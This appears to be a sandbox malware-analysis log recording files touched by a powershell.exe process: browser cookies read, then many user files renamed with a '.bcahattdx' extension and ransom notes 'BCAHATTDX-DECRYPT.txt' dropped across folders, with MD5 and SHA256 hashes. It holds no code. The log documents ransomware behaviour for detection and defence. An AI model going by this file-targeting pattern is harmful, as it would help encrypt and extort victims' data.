SHA256: c666938711da54526a279a019bef559b3a2237b8ff5fbf44e45bac5ad7570fa6
672
powershell.exe
C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 169fe8ba3cf0a20e49aeb7babe2ec08f
SHA256: f4cd381bf32ad10929ebd9d8d2b091bff77d8603264139fae058cf126fbd6986
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 972a2b266eaad935e87ee483c0633c7f
SHA256: 0824ef4c930b91c05f8a85a0148b9629836d848375fdd454519bdb95bc43e0ff
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: df3fdc2a4324394aada683441c6079cb
SHA256: 2b6473ec09fb6474eb6fb1688a7735d9210021b5d820b33b86e3a8a10e3bf4ed
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: abda164f6ee78236602559d2df54f5cb
SHA256: 72ecd1ee605b293223a182e739d0761b83d2daecb409991e872031f6bb338e4d
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: ec0ef41d23c34150b57136457319f979
SHA256: 99bbca61a5e9b1a58a3c06f5ab10f443ea9aa38fc8757cc5fcb4e9ad232b3ea7
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 92122edb0a6dc7308be77eb888fd41fa
SHA256: c96dfff62c038d3e750b564f97d72d7963665d80078a0de20b3c5993758be094
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 03099c46bdf92172fa927a594b01eef2
SHA256: 3602c2071df64b2f12ca73405f17a38edefb090edf70c444323b9adeac492615
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 67ab37629ae3df8225acd22dc647a6f4
SHA256: 4e31847e6f258112ca96324d3dc102402522f0cb3b491e2e01f6c6ded9569c05
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 5159a352a43eb2fd8cdcb1f83521b3d8
SHA256: f40f8e663c931a264ddbe7c19c925aa31cfa99e414d4fa0ec1115e3e3629b551
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 789592d7e4b19d8aad7a6130cc9f806a
SHA256: 17a0baa5e8784b95580da32125073467b35b59ff6c86ab0e6f34fcc54d0df169
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 5dcde3efca716bca4d48297b20ffeb33
SHA256: 7470b2e442b3cc424b6630f0d000e19acf088ad2ab82c593ee9bb8bf2ec4add3
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 910e11da690102dc0080be9fd24fc464
SHA256: adb6a7d87c9cbe02e3933906a09fde4aee5c5c8e7d0d1b1aefa1816204ebb7fd
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: a94ee3f6fa1d8974d12eed4345405f8e
SHA256: dc426c93e9dbbe0a94bd3c55565f6206493008a93b150f06db2f64b0676c4223
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 04e5dc5a3ae574f7176bee9884b04d0d
SHA256: 8011e72d30eab9bb377b9e88acedd4ff4766d905bed7a6b6b83f7f20703781b0
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 4c94d76f042451d03dd130c0d8e5d3b8
SHA256: 4736273c105efba47c15628c9481742a35f0a25e7a1bb32d86fa5e8e6aaedb2c
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 86e5737d07688c6e15d6218385ebeb08
SHA256: f2699ffd47834d636c75e3ca4d3bc16a16f6d3e24ea619d60fa5011da5c4718c
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: a5cbd5db0cac9a7321df9e43f6ba9fed
SHA256: 2b7a070dafd2ee6936f422b03e1f5bc9e16935c5cab25f9c9492ff832f9fc7f1
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: 1fcf4bd152a6611a6e434e369fba5cb1
SHA256: 97bb09b98b88e06da0799327281692b71d837e406e1717639c64300ad38b435d
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 828c28f9c08d343ec5808bed304f8cb5
SHA256: da6f5816341cdd81ae83c32085bb55872057a1e7becb7aabb022e00a53450e99
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: e8e45fd352996504c34645fc9fdbc9e7
SHA256: 76ab4773f7c5119271abebe2c323ba49ba43b0b46105ffb2c3af143d4a1cb5b4
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txt
text
MD5: ec2ab2fc30bb7c51d0c2c58d699e5028
SHA256: 566b42e385a86946401b5a354a58527d1182f47dc9cf95f4cbd85d4658c06fe1
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
binary
MD5: d2bc9b36bdee6e0e139eff911e0794b0
SHA256: 4da841c7508f9ea1680887279ce1a3e683caa9a2ffea588cc027c3f6f8f964de
672
powershell.exe
C:\Users\admin\AppData\Local\Temp\TarD39C.tmp
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Local\Temp\CabD39B.tmp
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
compressed
MD5: 2af3e4b57a8b637fcee8cb7485986fa3
SHA256: 10632f5e8df34d4641f11aa0ad917a629bf75f7c0eaa77506c5a27919e7b12aa
672
powershell.exe
C:\Users\admin\AppData\Local\Temp\CabD31C.tmp
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Local\Temp\TarD31D.tmp
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Local\Temp\TarD2FC.tmp
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Local\Temp\CabD2FB.tmp
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 9462cd32f98f1d24fdefb99805626685
SHA256: e98f750018372a949c73f270ad73df06212ba64c4ce84c5b0e2625419f9b0cb5
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 3bd4cd9ab6c469d1ee9f48a83f29ad9f
SHA256: 5d7a875523c6be09293333eb08988ff16dfa7acd7aee5c443b0de549fee58d74
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: 70a627e81b9326412f2298493a7cca19
SHA256: 98c1e991fecf98484ce94f13ab4090b2fa08168ecdea3ab156b2937ccdcb40f8
672
powershell.exe
C:\Users\admin\AppData\Local\Temp\pidor.bmp
image
MD5: ed6e8259443895400b4915919d590a26
SHA256: f20cad52ff78d44b4d12c2d5f5adf7461fbcb0b94d7885fac54d5483c2c7c96c
672
powershell.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.bcahattdx
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Videos\Sample Videos\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv.bcahattdx
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.bcahattdx
binary
MD5: f49f0f361c0e12252b30fe5b803e5b34
SHA256: 4507f895d29de4f3b89115cc7b5a61360b94668ef05147f912446702a94dbd8f
672
powershell.exe
C:\Users\Public\Recorded TV\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.bcahattdx
vc
MD5: 1ee703860d9a2774ac83468c26dd9960
SHA256: 1d1f6c747cef9ac499bf41e6b3e5702fb6ff8ce07ec2ff5b4c33427728c01deb
672
powershell.exe
C:\Users\Public\Recorded TV\Sample Media\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.bcahattdx
binary
MD5: c85fa0d715f3705fae79220a729035be
SHA256: 98198c5a01e82e4c7a0be4952c2f6f286e995103c2a9898e22246d3aeae3e73b
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.bcahattdx
binary
MD5: 99e9c86fd3b9b93334262f2563c32643
SHA256: c8cc6833d51e9404157e38902ebf16670a574b381f310a1b5e7a192b4c04ce42
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.bcahattdx
binary
MD5: 48b76829eab097ae8120a9b90a8649b8
SHA256: 7d7cff094a4a5443766f7b81aa46569469e20c797afc44d90afc5d11fedc3410
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.bcahattdx
binary
MD5: ce7285d97cd935fc313923ced5358415
SHA256: 7eb2e2175081f273feddaeb800c58422fe7448d8363b21a6438c38c19a2b0dc7
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.bcahattdx
binary
MD5: e0b3d56a0d64eae8ff672fa257e0a1aa
SHA256: db8e461ce53b93d5b164058240ef60d51c239c6fe9c0747ac0db8a46f60f6958
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.bcahattdx
binary
MD5: 8d11dc13d5d9585f117f207603444a28
SHA256: e37437e7ec2dffd40d7fab014c5ba09401d8b22032304afe831e07cc7c7ebc41
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3.bcahattdx
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Music\Sample Music\Sleep Away.mp3
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.bcahattdx
binary
MD5: 5d52faabaa19e7205e15595c457ca6e4
SHA256: 997a5507052c1581b5223a5a098ef0432fefc339882ecfe24747b73e8d702e00
672
powershell.exe
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3.bcahattdx
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Music\Sample Music\Kalimba.mp3
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Libraries\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\Public\Libraries\RecordedTV.library-ms.bcahattdx
binary
MD5: 7e8cbafdc5695f35b60a17c60ff7a73a
SHA256: 123cc3a67cb6edb409043b2ff846ce6b2b3ed7dbd425923c339a75e92ff4bce4
672
powershell.exe
C:\Users\Public\Music\Sample Music\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\Public\Libraries\RecordedTV.library-ms
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\Public\Downloads\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\Public\Music\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\Public\Favorites\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\Public\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\Public\Pictures\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\Public\Videos\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\Public\Documents\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\SendTo\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms.bcahattdx
binary
MD5: 0beff064c67eb83abf6499865d434a41
SHA256: e5ece0abf312531378ce9d36932be0a455b912f838f20ed040839e100176437d
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Saved Games\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms.bcahattdx
binary
MD5: 3d3f7051588c410124397df857b727ba
SHA256: 8e93141929d23d70cef09a87e5acd2940f85536957a8b1997d03d328fb9f18e0
672
powershell.exe
C:\Users\admin\Searches\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Pictures\supershow.jpg.bcahattdx
binary
MD5: 2d8663dbed2576f6dfa232c95f20fc37
SHA256: 1124039a6fe8140b485e63d6293b64f4e3813cc5df59a1c60a522e467e1b7a9c
672
powershell.exe
C:\Users\admin\Pictures\skipguy.png.bcahattdx
binary
MD5: f489e308600f5bbdb37ca7510d5556eb
SHA256: db41ea8fb9d63238a4d561f168ac78bb57b68ad15ebad8e3b2a201f7bdd67b66
672
powershell.exe
C:\Users\admin\Pictures\betterwritten.jpg.bcahattdx
binary
MD5: 97307a79f3d22cb326eb64a5caa68b3b
SHA256: 15ebb73c7c89f032d440d83f3443d7f91b74945fb85cea7c5c1b61a60ce59fca
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Pictures\supershow.jpg
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Pictures\betterwritten.jpg
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Pictures\skipguy.png
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Links\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url.bcahattdx
binary
MD5: eccaf1bab70c1ecf7ee6507962423e1d
SHA256: f4403177a6b42dce2c6755f4915079b3d505f5efe493a0e8e23a7bf1d31e51c5
672
powershell.exe
C:\Users\admin\ntuser.ini.bcahattdx
binary
MD5: f2b78cbe15afd8685ebc9a5540e173a8
SHA256: a150921d3e0d7ae0a11071e7c70aa59eafa838398ff515690b7f74ded2af60f3
672
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url.bcahattdx
binary
MD5: 0aac0883ec5c344b14846b071553b284
SHA256: 1bcb1cd41cdb3cac3b0c36690d5017cd04128c29166cc0eef8ddecae1b77e334
672
powershell.exe
C:\Users\admin\ntuser.ini
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url.bcahattdx
binary
MD5: 98626ed466ef67494ccb2fca78b4f701
SHA256: 8bfb52656324c14ccdd87e78d005ef2c533d206f0f5cc6bbce2196429f3aa31f
672
powershell.exe
C:\Users\admin\Favorites\Windows Live\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url.bcahattdx
binary
MD5: f772e746a64a93878ce299c64259719b
SHA256: 8f983e326c9f04aa15c083769da7f84fc2a151d74c9668de1c4128d26dfd6aed
672
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url.bcahattdx
binary
MD5: 98a1a8b5dc7cf13c2dec6f4a58f3bf0c
SHA256: 37622913ec7a274a21d75bdc66f6b063d588871a6e958cc1efaef2c30b3250e9
672
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url.bcahattdx
binary
MD5: 603915b8e40daadb64b76eb5887174c3
SHA256: 0b4a9afbd8b7de7ec2d07ba90e1a7df660fbe74dd593672b65b803d9a8a562b9
672
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url.bcahattdx
binary
MD5: 39bbc3296ff9e36a28aad5a4ad7ef594
SHA256: 26fe663ffd061484c2a99565c6f996ae22e3e20ddec1f312be79df281ee8e4be
672
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url.bcahattdx
binary
MD5: 51c517424a317b138ca3ea3e09976372
SHA256: f09f9201aeaaa340a4eb14dba6caf8648ffd27acfb0bb1d3479fe66791ce35ce
672
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url.bcahattdx
binary
MD5: 541a52841f45c1ca4a0482da606f646e
SHA256: 140ee6be80aac16445f3f4fc90af40b6c17296bbfbfa14b8e8df7de133058d71
672
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url.bcahattdx
binary
MD5: 5d77643fd97acffa094b9f15ea5e21f7
SHA256: 5674eecc44e628897229de9a61080a77cd29149417afdcd646657e8a93523feb
672
powershell.exe
C:\Users\admin\Favorites\MSN Websites\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url.bcahattdx
binary
MD5: 2eddb5b23a976e551d867df2edeba3af
SHA256: dcbcb692b231dae341f88a686c58bfc9f09f445cece5039d9e4f5cdd593a74ee
672
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url.bcahattdx
binary
MD5: 92c65799cde22468c5fe67ba345e8b5c
SHA256: 3fe0fc818d5add18b49f950fb741aedcb38fa692a8a09c9ed9b6ff8ea550d6ef
672
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url.bcahattdx
binary
MD5: 4cbabe82d649ca76560e88d6a47323da
SHA256: eb4d51b54980b52a09fb352baf035d4cecb966740e61d2b326fe6a458b7756db
672
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url.bcahattdx
binary
MD5: 3de98d9f662dd545e6228094c967e394
SHA256: dad074e331ae5bb0b68d79ca45598e9ea19ec48b615393a8549c66f7b29de9e7
672
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url.bcahattdx
flc
MD5: 860da7ff8b5eb1ac51338302beaf21d0
SHA256: 38fb752757f09662732fd024191c3af9a2a8f568cd6fc8ae3a6e3441f33c67dc
672
powershell.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url.bcahattdx
binary
MD5: d213cd589f587c17b75e6a9d49bc71fc
SHA256: 60d0c48cffb44f4629d4de927531c9d6d53039dcc8acf7ec858524d6f573b0f9
672
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url.bcahattdx
binary
MD5: e8da4f5a4aac7f92ccf723117bfb3eb6
SHA256: 1866ed18a37d8c0ee36431c108be179bf35e7d728e762461dc839be6f93eb9ac
672
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Downloads\pressfunds.jpg.bcahattdx
binary
MD5: 8b5a98ef170aabb510c467a6f98e3cb7
SHA256: 8336358062d6e94a2e193d88bd24e2b196aa81e5b28a2d168d5d170ef36570d0
672
powershell.exe
C:\Users\admin\Favorites\Links for United States\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url.bcahattdx
binary
MD5: e1226258b84ab237458794ea9eb82dad
SHA256: 522bc7906f6f863ebe4f159128d503d74b9bdcbfb3a1ba147612d9b49af98108
672
powershell.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url.bcahattdx
binary
MD5: 2145bc8a5a33bd3e5861620f0a5fd75c
SHA256: 79ec705319110bb3b821dfe5bf98fb4387e100613838529fc61976fa059e7338
672
powershell.exe
C:\Users\admin\Favorites\Links\BCAHATTDX-DECRYPT.txt
text
MD5: ee078fe9377fcaeb5c548c88caf47f82
SHA256: f4f635036030b1f3decdabf1f875dce3491c833be1379b87bb68609093d45512
672
powershell.exe
C:\Users\admin\Downloads\wineselection.jpg.bcahattdx
binary
MD5: 47c5813577ab70e3d0304cbdb97aa486
SHA256: b8af1381237787cc153acc7ddeb2328e83c6f4785e4b12450ffcc7353ad2a39b
672
powershell.exe
C:\Users\admin\Downloads\pressfunds.jpg
––
MD5:  ––
SHA256:  ––
672
powershell.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url
